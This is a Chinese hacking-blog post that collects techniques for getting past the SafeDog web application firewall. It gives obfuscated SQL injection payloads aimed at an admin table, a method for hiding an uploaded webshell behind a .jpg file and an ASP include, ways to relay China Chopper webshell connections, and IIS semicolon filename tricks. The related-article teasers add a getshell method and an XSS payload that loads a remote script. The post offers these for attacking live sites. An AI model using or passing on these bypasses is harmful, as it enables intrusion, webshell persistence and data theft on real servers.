过安全狗技术总汇全集!!

hacker5年前黑客文章688
1.过注入
2.过大马被阻拦访问
3.过菜刀连接一句话被拦截
4.过1.asp;.jpg这样的文件
其他我没遇到了。。
现在一点一点讲:
1.过注入
*** 一:a.asp?aaa=%00&id=sql语句
*** 二: a.asp?id=sql语句   里面把安全过滤的加个%l 比如: un%aion sel%aect 1,2,3,4 fr%aom admin
2.过大马被阻拦访问
*** 一:上传一个大马 然后访问http://sss.com/dama.asp  访问后出现拦截。
那么解决 *** 先将dama.asp改名dama.jpg上传,然后在同目录上传个文件da.asp 内容为: <!–#include file=”dama.jpg” –>  这样再访问da.asp  就不会被拦截了。
3.过菜刀连接一句话被拦截
*** 一:不用菜刀连接一句话,用别的一句话连接端。
*** 二:中转下连接菜刀,把过滤掉的词替换掉。
4.过1.asp;.jpg这样的文件拦截
*** 一:;1.asp;.jpg
*** 二:保密
具体就为大家总结这么多了,安全狗 反正基本可以无视了!!
大家还有什么要补充的可以发在下面!
下面这个脚本是过安全狗连接菜刀用的 用法: 先把这个脚本放到个可执行.asp的目录
然后访问http://www.xx.com/asf.asp?dz=你要过的那个webshell地址
然后把地址输入进菜刀 密码还是你要过的那个webshell的密码 类型也是选择那个一句话木马的后缀类型
例如:http://www.xx.com/asf.asp?dz=http://xxx.com/yijuhua.php 密码
这样输入就菜刀

这个脚本暂时支持.php .aspx的一句话连接  .asp的可能还不行 没测试过。如果谁有装了安全狗的webshell可以告诉我下。我再测试下把这个脚本修改全面都支持!

标签: 黑客技术

相关文章

南方数据企业网站管理系统12.0拿SHELL方法

南方数据企业网站管理系统12.0插配置文件拿SHELL 在我们拿到南方数据企业管理系统后台账号密码后,可以使用下面的方法来拿shell 进入后台后 点击系统管理 网站配...

AcunetixWVS的典型性主要用途是啥?

AcunetixWVS的典型性主要用途是啥?

什么是Acunetix WVS? Acunetix是一个Web漏洞检测程序流程,可全自动查验Web程序运行的系统漏洞,比如跨网站脚本制作,SQL引入,身份认证网页页面上的明文密码抗压强度和随意文件创...

学好应用Striker等于你也就会应用了17个网络黑客专业技

学好应用Striker等于你也就会应用了17个网络黑客专业技

Striker是一个让人抵触的信息内容和漏洞扫描器。只必须了解网站域名,就可以完成自动化技术信息收集和漏洞检测;针对初学者非常的合适!   作用 只应向Striker出示网站域名,它便会全...

dede xss通杀所有版本漏洞

漏洞原因:DEDECMS由于编辑器过滤不严,将导致恶意脚本运行。可getshell取得权限。为什么说它是0Day呢?能getshell的都算0Day(鸡肋发挥起来也能变凤凰)目前只是测试过5.3到...

黑客技术入门

黑客是需要不断学习的,一旦网上出现了新的技术,黑客就有了新的工作,他们必须在很短的时间内了解该技术的最基本的进程,这里说的 就是掌握干技术的核心技巧,,深入的了解该程序的运转,如果一个黑客停止了对...

xss跨站脚本攻击汇集

xss跨站脚本攻击汇集 (1)普通的XSS JavaScript注入 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>...